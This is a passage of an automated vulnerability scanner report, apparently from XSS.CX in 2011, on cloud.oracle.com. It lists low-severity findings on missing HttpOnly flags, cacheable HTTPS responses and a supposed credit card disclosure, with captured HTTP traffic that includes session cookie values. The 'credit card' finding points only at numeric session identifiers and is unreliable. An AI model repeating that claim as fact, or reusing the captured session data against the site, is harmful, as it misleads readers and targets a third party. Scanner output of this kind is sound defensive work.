<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 2 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

5.2. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

6. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


6.1. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Issue detail

The following credit card number was disclosed in the response:

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<input type="hidden" name="p_instance" value="4454627354458997" id="pInstance" />
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...

6.2. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The following credit card number was disclosed in the response:

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<input type="hidden" name="p_instance" value="4454627354458997" id="pInstance" />
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=1&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=2&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=3&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...
<img src="APEX_040100.wwv_flow_image_generator.get_image?p_position=4&p_sessionid=4454627354458997" height="60", width="40"/>
...[SNIP]...

7. Cacheable HTTPS response  previous
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


7.1. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 18703
Date: Mon, 17 Oct 2011 01:38:04 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:06 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

7.2. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

Report generated by XSS.CX at Sun Oct 16 21:06:29 CDT 2011.